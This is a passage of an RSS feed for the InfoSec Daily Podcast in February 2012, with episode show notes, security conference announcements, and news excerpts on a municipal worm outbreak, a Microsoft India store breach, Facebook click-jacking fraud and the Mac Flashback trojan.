	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately, this is having a major impact on our operations. This is the one thing we were told could not happen to us and it has happened to us,&quot; said Vallie Bowman-English, a clerk at the Toledo Municipal Court.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Technicians at NORIS headquarters are working nonstop to battle the worm, in what has essentially become a game of whack-a-mole.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Our virus protection software identifies it and says it&#39;s removing it, but it&#39;s actually popping back up,&quot; explained System Director Pat Wright.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While still unsure what caused the worm, Wright is confident NORIS was not hacked.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We do not know patient zero where it popped up. It kind of showed up on a bunch of desktops at once,&quot; said Wright.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Technicians are working on bring servers online one by one. If that strategy fails, they may need to rebuild the entire system from scratch.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-606-45-days-riskiest-online-cities-postgresql-s-2105-and-noris/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3562/0/infosec-daily-podcast-episode-606.mp3" length="15504971" type="audio/mpeg" />
		<itunes:duration>0:31:56</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 606 for February 28, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 606 for February 28, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=688
	When a hacker manages to penetrate Air Force computer networks, it generally takes experts more than a month to piece together what went wrong.
	 
	A forensics investigation into a network breach lasts an average of 45 days, said Arthur L. Wachdorf, senior advisor for intelligence and cyber-operations for the 24th Air Force, the organization that operates and defends the service&#8217;s networks.
	 
	&#8220;That&#8217;s way better than we used to be, but that&#8217;s not tactically acceptable,&#8221; he told an AFCEA information technology conference in Tysons Corner, Va.
	 
	The Air Force needs hardware and software that leaves no back doors to the network open, officials said. Currently, if hackers find a hole they can unload &#8220;truckloads of information&#8221; without the service even knowing they were even on the network, said Lt. Gen. Marc Rogers, inspector general of the Air Force.
	 
	Officials asked for industry help to improve its ability to watch over the network and detect and respond to unauthorized activity.
	 
	&#8220;We can do some but not enough,&#8221; Rogers said. &#8220;All of our cyber-moats and fort walls and locks and doors we build aren&#8217;t quite good enough.&#8221;
	 
	Companies looking for business opportunities in this arena should turn to Air Force Space Command.
	 
	&#8220;That&#8217;s where we&#8217;re going to spend our money,&#8221; said Lt. Gen. William Lord, chief of warfighting integration and chief information officer of the Air Force.
	&#8230;.
	Source: &#160;http://www.symantec.com/about/news/release/article.jsp?prid=20120215_01
	Norton teamed up with independent research firm Sperling&#8217;s BestPlaces to uncover the nation&#8217;s top 10 cities that have the highest number of cybercrime risk factors.
	This year marks the second time Norton and Sperling[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 605 &#8211; Microsoft Fail, Facebook Millionaires, Mac Hole, Webkit Vuln, and Facebook Snoopers</title>
		<link>http://www.isdpodcast.com/episode-605-microsoft-fail-facebook-millionaires-mac-hole-webkit-vuln-and-facebook-snoopers</link>
		<comments>http://www.isdpodcast.com/episode-605-microsoft-fail-facebook-millionaires-mac-hole-webkit-vuln-and-facebook-snoopers#comments</comments>
		<pubDate>Tue, 28 Feb 2012 01:57:31 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3557</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 605 for February 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 605 for February 27, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/certified-training"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/certified-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://thenextweb.com/in/2012/02/27/microsoft-india-backtracks-hack-may-have-exposed-customer-credit-card-details-after-all/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thenextweb.com/in/2012/02/27/microsoft-india-backtracks-hack-may-have-exposed-customer-credit-card-details-after-all/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has performed an about-turn in India and revealed that a recent hack of its online store may have compromised credit card details belonging to customers in the country.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the </span><a href="http://microsoftstore.co.in/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft India Store</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was</span><a href="http://www.firstpost.com/india/microsoft-store-india-hacked-login-ids-passwords-stolen-210890.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">hacked</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> earlier this month, the company emailed its customers to assure them that &ldquo;databases storing credit card details and payment information were not affected during this compromise&rdquo;. However, it now appears that this is incorrect.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wall Street Journal</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> columnist </span><a href="http://www.labnol.org/about/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amit Agarwal</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> writes on his own blog, a new update from Microsoft, which was sent to its customers today, has rather different news:</span></p>
<p dir="ltr" style="margin-left: 36pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Further detailed investigation and review of data provided by the website operator revealed that financial information may have been exposed for some Microsoft Store India customers.</span></p>
<p dir="ltr" style="margin-left: 36pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Furthermore, the store itself is still down, some two weeks after the incident, suggesting that there are serious problems afoot.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agarwal claims that </span><a href="http://quasar.co.in/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Quasar Media</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the company responsible for managing the online store, may have held customer data in plain text within the database. If true, it would allow the perpetrators of the attack to gain the information, and serious questions must asked as to why credit card details were not properly secured.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.scmagazine.com/facebook-click-jackers-allegedly-made-12-million-per-month/article/225012/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazine.com/facebook-click-jackers-allegedly-made-12-million-per-month/article/225012/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Facebook grows ever bigger, its popularity among persons seeking financial gains through digital deception increases commensurately. Witness the lawsuit filed this week by Washington State Attorney General Rob McKenna against the co-owners of Adscend Media, LLC. The complaint alleges that the ad network operated by Adscend Media was intended to &ldquo;encourage others to spread spam through misleading and deceptive tactics.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Foremost among these tactics was &ldquo;life-jacking&ldquo; which is a variation on &ldquo;click-jacking&rdquo; or tricking people into clicking links that do something other than what the clicker expects. Because legitimate companies often pay ad agencies &ldquo;per click&rdquo; for the display of digital ads or delivery of website traffic, a click-jacking scam rips-off the advertiser and may also deceive the ad agency that bought traffic or clicks on behalf of the advertiser, not to mention deceiving the consumer who does the clicking. This fraudulent triple-play can be very profitable. If you recall the DNSchanger scam to which the FBI put an end last November, the estimated profits were $14 million in just a few years. The click-jacking revenue figure quoted In the Adscend complaint is &ldquo;gross monthly revenues of up to $1.2 million.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For details of this scam, check out the news release from the Washington State Office of the Attorney General. Because &ldquo;likes&rdquo; on Facebook have considerable perceived value to advertisers, a variety of fraudulent techniques were used to generate clicks on the &quot;Like&quot; button, including bogus &ldquo;Click here to continue&rdquo; links. Facebook users temped by such salacious News Feed posts as &ldquo;OMG! See what happened to his Ex Girlfriend&rdquo;were fed a series of intermediary pages that harvested clicks and Likes while never presenting the promised content. At the same time, their friends were being fed links to the same bogus pages to spread and perpetuate the scam. There is an excellent description of the entire business model in the fascinating</span><a href="http://www.atg.wa.gov/uploadedFiles/Another/News/Adscend%20complaint.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Adscend complaint filed in U.S. District Court, Seattle</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (pdf file).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infosecurity-magazine.com/view/24144/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infosecurity-magazine.com/view/24144/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A report from Mac security specialist</span><a href="http://www.intego.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Intego</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> describes the Mac Flashback trojan as malware that &ldquo;patches web browsers and network applications essentially to search for user names and passwords.&rdquo; The assumption is that the target is bank details for immediate use, and passwords for longer term use. &ldquo;Hint:&rdquo; says Intego, &ldquo;don&rsquo;t use the same password for all websites!&rdquo; Intego first reported on this Flashback variant earlier this month, but has now seen increasing signs of its success.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the trojan cannot install itself directly &ndash; for example if Java is fully patched &ndash; Flashback attempts to trick the user into doing so. An &ldquo;applet displays a self-signed certificate, claiming to be issued by Apple. Most users won&rsquo;t understand what this means, and click on Continue to allow the installation to continue.&rdquo; But the trojan won&rsquo;t attempt to install itself if the Mac has anti-virus. &ldquo;It seems that the malware writers feel it is best to avoid Macs where the malware might be detected, and focus on the many that aren&rsquo;t protected.&rdquo;</span></p>
